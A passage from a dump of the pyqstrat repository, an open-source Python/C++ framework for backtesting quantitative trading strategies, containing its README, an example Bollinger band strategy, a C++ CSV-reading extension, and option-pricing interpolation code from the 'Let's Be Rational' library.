r, double sigma, double q = 0);\ndouble theta(bool call, double S, double K, double t, double r, double sigma, double q = 0);\n// Use _ to avoid conflict with gamma in math.h\ndouble _gamma(double S, double K, double t, double r, double sigma, double q = 0);\ndouble vega(double S, double K, double t, double r, double sigma, double q = 0);\ndouble rho(bool call, double S, double K, double t, double r, double sigma, double q = 0);\ndouble implied_vol(bool call, double price, double S, double K, double t, double r, double q = 0);\n\n// From lets be rational\n\n#include \"../lets_be_rational/importexport.h\"\n\nEXPORT_EXTERN_C double implied_volatility_from_a_transformed_rational_guess(double price, double F, double K, double T, double q);\n\n#endif\n\n" }, { "alpha_fraction": 0.7549164295196533, "alphanum_fraction": 0.76474928855896, "avg_line_length": 44.66292190551758, "blob_id": "4714bff9d954fdd0243391b7bba9a92699c04896", "content_id": "abdc34b1b3a879565859775873ded0ce3b77ed37", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4068, "license_type": "permissive", "max_line_length": 292, "num_lines": 89, "path": "/README.rst", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "|PyVersion| |Status| |License|\n\nIntroduction\n============\n\nThe ``pyqstrat`` package is designed for backtesting quantitative strategies. It was originally built for my own use as a quant trader / researcher, after I could not find a python based framework that was fast, extensible and transparent enough for use in my work. \n\nThis framework is designed for capable programmers who are comfortable with numpy and reasonably advanced Python techniques.\n\nThe goals are:\n\n* Speed - Performance sensitive components are written at the numpy level, or in C++, which can lead to performance improvement of several orders of magnitude over regular Python code. Where possible, we parrallelize work so you can take advantage of all the cores available on your machine.\n* Transparency - If you are going to commit money to a strategy, you want to know exactly what assumptions you are making. The code is written and documented so these are as clear as possible.\n* Extensibility - It would be impossible to think of all requirements for backtesting strategies that traders could come up with. In addition, traders will want to measure different metrics depending on the strategy being traded.\n\nUsing this framework, you can:\n\n* Create indicators, trading signals, trading rules and market simulators and add them to a strategy\n* Create contract groups for PNL grouping. For example, for futures and options, you often have a group such as the \"front-month future\" or the \"delta hedge\" where the actual instruments change over time but you still want to analyze PNL at the contract group level.\n* Reuse existing market simulation or add your own assumptions to simulate how and when orders are filled\n* Measure returns, drawdowns, common return metrics such as sharpe, calmar and also add your own metrics.\n* Optimize your strategy's parameters using all the CPU cores on your machine.\n\n\n** NOTE: This is beta software and the API will change **\n\nInstallation\n------------\nI would strongly recommend installing anaconda and creating an anaconda environment. I personally prefer miniconda which runs much faster than the original anaconda. See https://github.com/conda-forge/miniforge for installation instructions.\n\npyqstrat relies on numpy, scipy, matplotlib and pandas which in turn use Fortran and C code that needs to be compiled.\n\n::\n\n conda install --channel conda-forge pyqstrat\n\nRequirements:\n\n* Python_ version 3.10 or higher;\n\nDocumentation\n-------------\n\nThe best way to get started is to go through this Jupyter notebook: `Building Strategies <https://github.com/abbass2/pyqstrat/tree/master/pyqstrat/notebooks/building_strategies.ipynb>`_\n\n`Jupyter Notebooks <https://github.com/abbass2/pyqstrat/tree/master/pyqstrat/notebooks>`_ \n\n`API docs <https://abbass2.github.io/pyqstrat>`_\n\nDiscussion\n----------\n\nThe `pyqstrat user group <https://groups.io/g/pyqstrat>`_ is the group used for pyqstrat discussions.\n\n\nAcknowledgements\n----------------\n\nBefore building this, I looked at the following. Although I ended up not using them, they are definitely worth looking at.\n\n`R quantstrat library <https://github.com/braverock/quantstrat>`_\n\n`Python backtrader project <https://www.backtrader.com>`_\n\n\nSome of the ideas I use in this framework come from the following books\n\n`Trading Systems: A New Approach to System Development and Portfolio Optimisation - Tomasini, Emilio and Jaekle, Urban <https://www.amazon.com/gp/product/1905641796/ref=oh_aui_search_detailpage?ie=UTF8&psc=1>`_\n\n`Machine Trading - Chan, Ernie <https://www.amazon.com/gp/product/1119219604>`_\n\n`Algorithmic Trading: Winning Strategies and Their Rationale - Chan, Ernie <https://www.amazon.com/gp/product/1118460146>`_\n\n\nDisclaimer\n----------\n\nThe software is provided on the conditions of the simplified BSD license.\n\n.. _Python: http://www.python.org\n\n.. |PyVersion| image:: https://img.shields.io/badge/python-3.7+-blue.svg\n :alt:\n\n.. |Status| image:: https://img.shields.io/badge/status-beta-green.svg\n :alt:\n\n.. |License| image:: https://img.shields.io/badge/license-BSD-blue.svg\n :alt:\n \n" }, { "alpha_fraction": 0.6462730765342712, "alphanum_fraction": 0.6543535590171814, "avg_line_length": 43.26277542114258, "blob_id": "f0200c8f8b67191204b3f3178c7859400462df42", "content_id": "e619015bfb41b6384faacdd21d13381915caa741", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6064, "license_type": "permissive", "max_line_length": 152, "num_lines": 137, "path": "/pyqstrat/notebooks/support/build_example_strategy.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "# type: ignore\n# flake8: noqa\n\nimport pandas as pd\nimport numpy as np\nimport math\nfrom types import SimpleNamespace\nimport pyqstrat as pq\n\ndef sma(contract_group, timestamps, indicators, strategy_context): # simple moving average\n sma = pd.Series(indicators.c).rolling(window = strategy_context.lookback_period).mean()\n return sma.values\n\ndef band(contract_group, timestamps, indicators, strategy_context, upper):\n std = pd.Series(indicators.c).rolling(window = strategy_context.lookback_period).std()\n return indicators.sma + strategy_context.num_std * std * (1 if upper else -1)\n\nupper_band = lambda contract_group, timestamps, indicators, strategy_context : \\\n band(contract_group, timestamps, indicators, strategy_context, upper = True)\n\nlower_band = lambda contract_group, timestamps, indicators, strategy_context : \\\n band(contract_group, timestamps, indicators, strategy_context, upper = False)\n\ndef bollinger_band_signal(contract_group, timestamps, indicators, parent_signals, strategy_context):\n # Replace nans with 0 so we don't get errors later when comparing nans to floats\n h = np.nan_to_num(indicators.h)\n l = np.nan_to_num(indicators.l)\n \n upper_band = np.nan_to_num(indicators.upper_band)\n lower_band = np.nan_to_num(indicators.lower_band)\n sma = np.nan_to_num(indicators.sma)\n \n signal = np.where(h > upper_band, 2, 0)\n signal = np.where(l < lower_band, -2, signal)\n signal = np.where((h > sma) & (signal == 0), 1, signal) # price crossed above simple moving avg but not above upper band\n signal = np.where((l < sma) & (signal == 0), -1, signal) # price crossed below simple moving avg but not below lower band\n return signal\n\ndef bollinger_band_trading_rule(contract_group, i, timestamps, indicators, signal, account, current_orders, strategy_context):\n timestamp = timestamps[i]\n curr_pos = account.position(contract_group, timestamp)\n signal_value = signal[i]\n risk_percent = 0.1\n close_price = indicators.c[i]\n \n contract = contract_group.get_contract('PEP')\n if contract is None:\n contract = pq.Contract.create(symbol = 'PEP', contract_group = contract_group)\n \n # if we don't already have a position, check if we should enter a trade\n if math.isclose(curr_pos, 0):\n if signal_value == 2 or signal_value == -2:\n curr_equity = account.equity(timestamp)\n order_qty = np.round(curr_equity * risk_percent / close_price * np.sign(signal_value))\n trigger_price = close_price\n reason_code = pq.ReasonCode.ENTER_LONG if order_qty > 0 else pq.ReasonCode.ENTER_SHORT\n return [pq.StopLimitOrder(contract=contract, timestamp=timestamp, qty=order_qty, trigger_price=trigger_price, reason_code=reason_code)]\n \n else: # We have a current position, so check if we should exit\n if (curr_pos > 0 and signal_value == -1) or (curr_pos < 0 and signal_value == 1):\n order_qty = -curr_pos\n reason_code = pq.ReasonCode.EXIT_LONG if order_qty < 0 else pq.ReasonCode.EXIT_SHORT\n return [pq.MarketOrder(contract=contract, timestamp=timestamp, qty=order_qty, reason_code=reason_code)]\n return []\n\ndef market_simulator(orders, i, timestamps, indicators, signals, strategy_context):\n trades = []\n timestamp = timestamps[i]\n \n \n for order in orders:\n trade_price = np.nan\n \n cgroup = order.contract.contract_group\n ind = indicators[cgroup]\n \n o, h, l, c = ind.o[i], ind.h[i], ind.l[i], ind.c[i]\n \n if isinstance(order, pq.MarketOrder):\n trade_price = 0.5 * (o + h) if order.qty > 0 else 0.5 * (o + l)\n elif isinstance(order, pq.StopLimitOrder):\n if (order.qty > 0 and h > order.trigger_price) or (order.qty < 0 and l < order.trigger_price): # A stop order\n trade_price = 0.5 * (order.trigger_price + h) if order.qty > 0 else 0.5 * (order.trigger_price + l)\n else:\n raise Exception(f'unexpected order type: {order}')\n \n if np.isnan(trade_price): continue\n \n trade = pq.Trade(order.contract, order, timestamp, order.qty, trade_price, commission = order.qty * 5, fee = 0)\n order.status = 'filled'\n \n trades.append(trade)\n \n return trades\n\ndef get_price(symbol, timestamps, i, strategy_context):\n return strategy_context.c[i]\n\ndef build_example_strategy(strategy_context):\n\n try:\n file_path = os.path.dirname(os.path.realpath(__file__)) + '/../notebooks/support/pepsi_15_min_prices.csv.gz' # If we are running from unit tests\n except:\n file_path = '../notebooks/support/pepsi_15_min_prices.csv.gz'\n \n prices = pd.read_csv(file_path)\n prices.date = pd.to_datetime(prices.date)\n\n timestamps = prices.date.values\n\n pq.ContractGroup.clear()\n pq.Contract.clear()\n\n contract_group = pq.ContractGroup.create('PEP')\n\n strategy_context.c = prices.c.values # For use in the get_price function\n\n strategy = pq.Strategy(timestamps, [contract_group], get_price, trade_lag = 1, strategy_context = strategy_context)\n \n strategy.add_indicator('o', prices.o.values)\n strategy.add_indicator('h', prices.h.values)\n strategy.add_indicator('l', prices.l.values)\n strategy.add_indicator('c', prices.c.values)\n\n strategy.add_indicator('sma', sma, depends_on = ['c'])\n strategy.add_indicator('upper_band', upper_band, depends_on = ['c', 'sma'])\n strategy.add_indicator('lower_band', lower_band, depends_on = ['c', 'sma'])\n \n strategy.add_signal('bb_signal', bollinger_band_signal, depends_on_indicators = ['h', 'l', 'sma', 'upper_band', 'lower_band'])\n\n # ask pqstrat to call our trading rule when the signal has one of the values [-2, -1, 1, 2]\n strategy.add_rule('bb_trading_rule', bollinger_band_trading_rule, \n signal_name = 'bb_signal', sig_true_values = [-2, -1, 1, 2])\n\n strategy.add_market_sim(market_simulator)\n\n return strategy\n" }, { "alpha_fraction": 0.5379387140274048, "alphanum_fraction": 0.5503144860267639, "avg_line_length": 28.51197624206543, "blob_id": "02a908fc9b2668690bd1be488614f4396876bfad", "content_id": "cb9a409d4adf5afe08405bd54e1b803f7273e7a8", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9860, "license_type": "permissive", "max_line_length": 108, "num_lines": 334, "path": "/pyqstrat/cpp/io/read_file.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// read_file.cpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/11/22.\n//\n#define PY_SSIZE_T_CLEAN\n#define NPY_NO_DEPRECATED_API 1\n#include <Python.h>\n#include <vector>\n#include <string>\n#include <memory>\n#include <iostream>\n#include <time.h>\n#include \"structmember.h\"\n#include \"csv_reader.hpp\"\n#include \"numpy/ndarrayobject.h\"\n\n\n#include <time.h>\n#include <iomanip>\n#include <sstream>\n\n\n//strptime not inmplemented in windows\n#ifdef _MSC_VER\nextern \"C\" char* strptime(const char* s,\n const char* f,\n struct tm* tm) {\n std::istringstream input(s);\n input.imbue(std::locale(setlocale(LC_ALL, nullptr)));\n input >> std::get_time(tm, f);\n if (input.fail()) {\n return nullptr;\n }\n return (char*)(s + input.tellg());\n}\n#endif\n\n\nusing namespace std;\n\nstatic int read_list(PyObject* list, vector<int>& vec) {\n if (list == NULL) return 0; // Empty vector\n Py_ssize_t n = PyList_Size(list);\n for (int i=0; i < n; i++) {\n PyObject* item = PyList_GetItem(list, i);\n if (!PyLong_Check(item)) {\n PyErr_SetString(PyExc_TypeError, \"list items must be integers.\");\n return 0;\n }\n int elem = static_cast<int>(PyLong_AsLong(item));\n vec.push_back(elem);\n }\n return -1;\n}\n\nstatic int read_list(PyObject* list, vector<string>& vec) {\n if (list == NULL) return 0; // Empty vector\n Py_ssize_t n = PyList_Size(list);\n for (int i=0; i < n; i++) {\n PyObject* item = PyList_GetItem(list, i);\n if (!PyUnicode_Check(item)) {\n PyErr_SetString(PyExc_TypeError, \"list items must be strings.\");\n return 0;\n }\n PyObject* ascii = PyUnicode_AsASCIIString(item);\n char* ret_string = PyBytes_AsString(ascii);\n vec.push_back(std::string(ret_string));\n Py_DECREF(ascii);\n }\n return -1;\n}\n\nstatic PyObject* create_np_str_array(const std::vector<std::string>& vals, size_t itemsize){\n \n size_t mem_size = vals.size() * itemsize;\n \n void * mem = PyDataMem_NEW(mem_size);\n \n size_t cur_index=0;\n \n for (const auto& val : vals){\n for(size_t i = 0; i < itemsize; i++){\n char ch = i < val.size() ? val[i] : 0; // fill with NULL if string too short\n reinterpret_cast<char*>(mem)[cur_index] = ch;\n cur_index++;\n }\n }\n\n npy_intp dim = static_cast<npy_intp>(vals.size());\n \n PyObject* arr = PyArray_New(&PyArray_Type, 1, &dim, NPY_STRING, NULL, mem,\n static_cast<int>(itemsize), NPY_ARRAY_CARRAY | NPY_ARRAY_OWNDATA, NULL);\n PyArray_ENABLEFLAGS((PyArrayObject*)arr, NPY_ARRAY_OWNDATA);\n return arr;\n}\n\ntemplate<typename T> PyObject* create_np_array(PyArray_Descr* descr, void* data) {\n npy_intp dims[1];\n auto vec = static_cast<vector<T>*>(data);\n dims[0] = vec->size();\n auto _data = new T[vec->size()];\n ::memcpy(\n _data,\n vec->data(),\n vec->size() * sizeof(T));\n delete vec;\n\n \n PyObject* arr = PyArray_NewFromDescr(&PyArray_Type, descr, 1, dims, NULL, _data,\n NPY_ARRAY_CARRAY | NPY_ARRAY_OWNDATA , NULL);\n PyArray_ENABLEFLAGS((PyArrayObject*)arr, NPY_ARRAY_OWNDATA);\n\n if (arr == NULL) {\n PyErr_SetString(PyExc_TypeError, \"could not allocate numpy array\");\n return NULL;\n }\n return arr;\n}\n\n \nstatic PyObject* create_np_array(const std::string& dtype, void* data) {\n \n PyObject* _dtype = Py_BuildValue(\"s\", dtype.c_str());\n PyArray_Descr* descr;\n PyArray_DescrConverter(_dtype, &descr);\n Py_XDECREF(_dtype);\n \n PyObject* arr = NULL;\n if (dtype[0] == 'S') {\n size_t itemsize = atoi(dtype.substr(1).c_str());\n if (itemsize <= 0) {\n PyErr_SetString(PyExc_TypeError, \"item size must be a positive int\");\n return NULL;\n }\n auto col = static_cast<vector<string>*>(data);\n arr = create_np_str_array(*col, itemsize);\n delete col;\n } else if (dtype.substr(0, 3) == \"M8[\") {\n arr = create_np_array<int64_t>(descr, data);\n } else if (dtype == \"i1\") {\n arr = create_np_array<int8_t>(descr, data);\n } else if (dtype == \"i4\") {\n arr = create_np_array<int32_t>(descr, data);\n } else if (dtype == \"i8\") {\n arr = create_np_array<int64_t>(descr, data);\n } else if (dtype == \"f4\") {\n arr = create_np_array<float>(descr, data);\n } else if (dtype == \"f8\") {\n arr = create_np_array<double>(descr, data);\n } else {\n PyErr_SetString(PyExc_TypeError, \"only f4, f8, i1, i4, i8, M8[*] and S[n] datatypes are supported\");\n }\n return arr;\n}\n\nstatic PyObject*\nread_file(PyObject* self, PyObject* args, PyObject* kwargs) {\n char* filename = NULL;\n PyObject* _col_indices = NULL;\n PyObject* _dtypes = NULL;\n char* separator = NULL;\n int skip_rows = 1;\n int max_rows = 0;\n \n const char *kwlist[] = {\n \"filename\",\n \"col_indices\",\n \"dtypes\",\n \"separator\",\n \"skip_rows\",\n \"max_rows\",\n NULL};\n \n if (!PyArg_ParseTupleAndKeywords(args,\n kwargs,\n \"sOO|siOi\",\n const_cast<char**>(kwlist),\n &filename,\n &_col_indices,\n &_dtypes,\n &separator,\n &skip_rows,\n &max_rows)) {\n return NULL;\n }\n if (!PyList_Check(_col_indices)) {\n PyErr_SetString(PyExc_RuntimeError, \"col_indices must be a list\");\n return NULL;\n }\n\n if (!PyList_Check(_dtypes)) {\n PyErr_SetString(PyExc_RuntimeError, \"dtypes must be a list\");\n return NULL;\n }\n vector<string> dtypes;\n vector<int> col_indices;\n if (!read_list(_col_indices, col_indices)) return NULL;\n \n int max_col_idx = -1;\n for (auto i: col_indices) {\n if (i <= max_col_idx) {\n PyErr_SetString(PyExc_RuntimeError, \"col_indices must be monotonically increasing\");\n return NULL;\n }\n max_col_idx = i;\n }\n \n if (!read_list(_dtypes, dtypes)) return NULL;\n if (skip_rows < 0) {\n PyErr_SetString(PyExc_RuntimeError, \"skip_rows must be >= 0\");\n return NULL;\n }\n if (max_rows < 0) {\n PyErr_SetString(PyExc_RuntimeError, \"max_rows must be positive (or zero to read all rows)\");\n return NULL;\n }\n \n if (col_indices.size() != dtypes.size()) {\n PyErr_SetString(PyExc_RuntimeError, \"col_indices and dtypes must be same size\");\n return NULL;\n }\n \n // release the gil\n PyThreadState *_save;\n _save = PyEval_SaveThread();\n vector<void*> data;\n try {\n read_csv(filename, col_indices, dtypes, separator[0], skip_rows, max_rows, data);\n } catch (const std::exception& ex) {\n PyEval_RestoreThread(_save);\n PyErr_SetString(PyExc_RuntimeError, ex.what());\n return NULL;\n }\n //reaquire the gil\n PyEval_RestoreThread(_save);\n \n auto arrays = PyList_New(dtypes.size());\n\n int i = 0;\n for (auto _dtype: dtypes) {\n PyObject* arr = create_np_array(_dtype, data[i]);\n if (arr == NULL) {\n Py_XDECREF(arrays);\n return NULL;\n }\n PyList_SetItem(arrays, i, arr);\n i++;\n }\n return arrays;\n}\n\nstatic time_t time_to_epoch ( const struct tm *ltm, int utcdiff ) {\n const int mon_days [] =\n {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};\n long tyears, tdays, leaps, utc_hrs;\n int i;\n\n tyears = ltm->tm_year - 70 ; // tm->tm_year is from 1900.\n leaps = (tyears + 2) / 4; // no of next two lines until year 2100.\n //i = (ltm->tm_year – 100) / 100;\n //leaps -= ( (i/4)*3 + i%4 );\n tdays = 0;\n for (i=0; i < ltm->tm_mon; i++) tdays += mon_days[i];\n\n tdays += ltm->tm_mday-1; // days of month passed.\n tdays = tdays + (tyears * 365) + leaps;\n\n utc_hrs = ltm->tm_hour + utcdiff; // for your time zone.\n return (tdays * 86400) + (utc_hrs * 3600) + (ltm->tm_min * 60) + ltm->tm_sec;\n}\n\nstatic PyObject*\nparse_datetimes(PyObject* self, PyObject* args) {\n PyObject* datetimes = NULL;\n if (!PyArg_ParseTuple(args, \"O!\", &PyArray_Type, &datetimes)) return NULL;\n\n if (datetimes == NULL) return NULL;\n\n npy_intp n = PyArray_SIZE(datetimes);\n vector<::time_t> output(n);\n\n struct tm tm;\n for (size_t i = 0; i < static_cast<size_t>(n); ++i) {\n PyObject *item = PySequence_GetItem(datetimes, i);\n if (!item) {\n return NULL;\n }\n Py_ssize_t size;\n const char *time_str = PyUnicode_AsUTF8AndSize(item, &size);\n if (!time_str) {\n return NULL;\n }\n if (time_str == NULL) return NULL;\n ::memset(&tm, 0, sizeof(tm));\n ::strptime(time_str, \"%Y-%m-%dT%H:%M:%S\", &tm);\n ::time_t event_time = ::time_to_epoch(&tm, 0);\n output[i] = event_time;\n }\n PyObject* arr = create_np_array(\"M8[s]\", &output);\n return arr;\n}\n\n \nstatic PyMethodDef IOModuleMethods[] = {\n {\"read_file\", (PyCFunction)(void(*)(void))read_file, METH_VARARGS | METH_KEYWORDS, \"read a file\"},\n {\"parse_datetimes\", parse_datetimes, METH_VARARGS, \"parse datetimes\"},\n {NULL, NULL, 0, NULL}\n};\n\n \nstatic struct PyModuleDef io_module = {\n PyModuleDef_HEAD_INIT,\n \"pyqstrat_io\",\n NULL,\n -1,\n IOModuleMethods\n};\n\n/* The classes below are exported */\n#ifdef __GNUC__\n#pragma GCC visibility push(default)\n#endif\n\nPyMODINIT_FUNC\nPyInit_pyqstrat_io(void) {\n import_array();\n return PyModule_Create(&io_module);\n}\n\n#ifdef __GNUC__\n#pragma GCC visibility pop\n#endif\n\n" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6304348111152649, "avg_line_length": 45, "blob_id": "61d7cac0bfe62706160608201d398fdbd92af6b9", "content_id": "64c2f4a3d62023af7236deb38817e2a753c6334d", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 46, "license_type": "permissive", "max_line_length": 45, "num_lines": 1, "path": "/pyqstrat/gen_py_files.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "find *.ipynb -maxdepth 1 -exec jup_mini {} \\;\n" }, { "alpha_fraction": 0.6035874485969543, "alphanum_fraction": 0.6152466535568237, "avg_line_length": 29.97222137451172, "blob_id": "fced5319c26defce7ed962d4c00ead707803dbeb", "content_id": "d560b617054b1c08bcc89bc37d46c557c4dfceaf", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1116, "license_type": "permissive", "max_line_length": 92, "num_lines": 36, "path": "/pyqstrat/cpp/lets_be_rational/importexport.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef IMPORTEXPORT_H\n#define IMPORTEXPORT_H\n\n#if defined(_WIN32) || defined(_WIN64)\n# define EXPORT __declspec(dllexport)\n# define IMPORT __declspec(dllimport)\n# else\n# define EXPORT\n# define IMPORT\n#endif\n\n#ifdef __cplusplus\n# define EXTERN_C extern \"C\"\n#else\n# define EXTERN_C\n#endif\n\n# define EXPORT_EXTERN_C EXTERN_C EXPORT\n# define IMPORT_EXTERN_C EXTERN_C IMPORT\n\n#endif // IMPORTEXPORT_H\n" }, { "alpha_fraction": 0.6943231225013733, "alphanum_fraction": 0.7056768536567688, "avg_line_length": 66.35294342041016, "blob_id": "0df2aeb999bdef9ad0a7314233381d19785e702f", "content_id": "e3eefa5f16ee74d0c5850ec3442a1705384b6581", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2295, "license_type": "permissive", "max_line_length": 246, "num_lines": 34, "path": "/pyqstrat/cpp/lets_be_rational/rationalcubic.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef RATIONAL_CUBIC_H\n#define RATIONAL_CUBIC_H\n\n// Based on\n//\n// “Shape preserving piecewise rational interpolation”, R. Delbourgo, J.A. Gregory - SIAM journal on scientific and statistical computing, 1985 - SIAM.\n// http://dspace.brunel.ac.uk/bitstream/2438/2200/1/TR_10_83.pdf [caveat emptor: there are some typographical errors in that draft version]\n//\n\n#include \"importexport.h\"\n\nEXPORT_EXTERN_C double rational_cubic_interpolation(double x, double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double r);\nEXPORT_EXTERN_C double rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l);\nEXPORT_EXTERN_C double rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r);\nEXPORT_EXTERN_C double minimum_rational_cubic_control_parameter(double d_l, double d_r, double s, bool preferShapePreservationOverSmoothness);\nEXPORT_EXTERN_C double convex_rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l, bool preferShapePreservationOverSmoothness);\nEXPORT_EXTERN_C double convex_rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r, bool preferShapePreservationOverSmoothness);\n\n#endif // RATIONAL_CUBIC_H\n" }, { "alpha_fraction": 0.6592581272125244, "alphanum_fraction": 0.6715723276138306, "avg_line_length": 56.90434646606445, "blob_id": "1596e452bf53e449d0669f5e56888aaf638b86cb", "content_id": "b137d7eb35068a5af6c4a298ca6d1c7db2f49417", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6664, "license_type": "permissive", "max_line_length": 246, "num_lines": 115, "path": "/pyqstrat/cpp/lets_be_rational/rationalcubic.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n\n#include \"rationalcubic.h\"\n\n#if defined(_MSC_VER)\n# define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n// YOU NEED THESE FOR THE SAKE OF *ACCURACY* WHEN |x| IS LARGE, say, |x|>50.\n// This is because they effectively enable the evaluation of certain\n// expressions in 80 bit registers without loss of intermediate accuracy.\n# pragma float_control( except, off )\n# pragma float_control( precise, off )\n# pragma fp_contract( on )\n# pragma fenv_access( off )\n#endif\n\n#include <float.h>\n#include <cmath>\n#include <algorithm>\n\n// Based on\n//\n// “Shape preserving piecewise rational interpolation”, R. Delbourgo, J.A. Gregory - SIAM journal on scientific and statistical computing, 1985 - SIAM.\n// http://dspace.brunel.ac.uk/bitstream/2438/2200/1/TR_10_83.pdf [caveat emptor: there are some typographical errors in that draft version]\n//\n\nnamespace {\n const double minimum_rational_cubic_control_parameter_value = -(1 - sqrt(DBL_EPSILON));\n const double maximum_rational_cubic_control_parameter_value = 2 / (DBL_EPSILON * DBL_EPSILON);\n inline bool is_zero(double x){ return fabs(x) < DBL_MIN; }\n}\n\ndouble rational_cubic_interpolation(double x, double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double r) {\n const double h = (x_r - x_l);\n if (fabs(h)<=0)\n return 0.5 * (y_l + y_r);\n // r should be greater than -1. We do not use assert(r > -1) here in order to allow values such as NaN to be propagated as they should.\n const double t = (x - x_l) / h;\n if ( ! (r >= maximum_rational_cubic_control_parameter_value) ) {\n const double t = (x - x_l) / h, omt = 1 - t, t2 = t * t, omt2 = omt * omt;\n // Formula (2.4) divided by formula (2.5)\n return (y_r * t2 * t + (r * y_r - h * d_r) * t2 * omt + (r * y_l + h * d_l) * t * omt2 + y_l * omt2 * omt) / (1 + (r - 3) * t * omt);\n }\n // Linear interpolation without over-or underflow.\n return y_r * t + y_l * (1 - t);\n}\n\ndouble rational_cubic_control_parameter_to_fit_second_derivative_at_left_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_l) {\n const double h = (x_r-x_l), numerator = 0.5*h*second_derivative_l+(d_r-d_l);\n if (is_zero(numerator))\n return 0;\n const double denominator = (y_r-y_l)/h-d_l;\n if (is_zero(denominator))\n return numerator>0 ? maximum_rational_cubic_control_parameter_value : minimum_rational_cubic_control_parameter_value;\n return numerator/denominator;\n}\n\ndouble rational_cubic_control_parameter_to_fit_second_derivative_at_right_side(double x_l, double x_r, double y_l, double y_r, double d_l, double d_r, double second_derivative_r) {\n const double h = (x_r-x_l), numerator = 0.5*h*second_derivative_r+(d_r-d_l);\n if (is_zero(numerator))\n return 0;\n const double denominator = d_r-(y_r-y_l)/h;\n if (is_zero(denominator))\n return numerator>0 ? maximum_rational_cubic_control_parameter_value : minimum_rational_cubic_control_parameter_value;\n return numerator/denominator;\n}\n\ndouble minimum_rational_cubic_control_parameter(double d_l, double d_r, double s, bool preferShapePreservationOverSmoothness) {\n const bool monotonic = d_l * s >= 0 && d_r * s >= 0, convex = d_l <= s && s <= d_r, concave = d_l >= s && s >= d_r;\n if (!monotonic && !convex && !concave) // If 3==r_non_shape_preserving_target, this means revert to standard cubic.\n return minimum_rational_cubic_control_parameter_value;\n const double d_r_m_d_l = d_r - d_l, d_r_m_s = d_r - s, s_m_d_l = s - d_l;\n double r1 = -DBL_MAX, r2 = r1;\n // If monotonicity on this interval is possible, set r1 to satisfy the monotonicity condition (3.8).\n if (monotonic){\n if (!is_zero(s)) // (3.8), avoiding division by zero.\n r1 = (d_r + d_l) / s; // (3.8)\n else if (preferShapePreservationOverSmoothness) // If division by zero would occur, and shape preservation is preferred, set value to enforce linear interpolation.\n r1 = maximum_rational_cubic_control_parameter_value; // This value enforces linear interpolation.\n }\n if (convex || concave) {\n if (!(is_zero(s_m_d_l) || is_zero(d_r_m_s))) // (3.18), avoiding division by zero.\n r2 = std::max(fabs(d_r_m_d_l / d_r_m_s), fabs(d_r_m_d_l / s_m_d_l));\n else if (preferShapePreservationOverSmoothness)\n r2 = maximum_rational_cubic_control_parameter_value; // This value enforces linear interpolation.\n } else if (monotonic && preferShapePreservationOverSmoothness)\n r2 = maximum_rational_cubic_control_parameter_value; // This enforces linear interpolation along segments that are inconsistent with the slopes on the boundaries, e.g., a perfectly horizontal segment that has negative slopes on either edge.\n return std::max(minimum_rational_cubic_control_parameter_value, 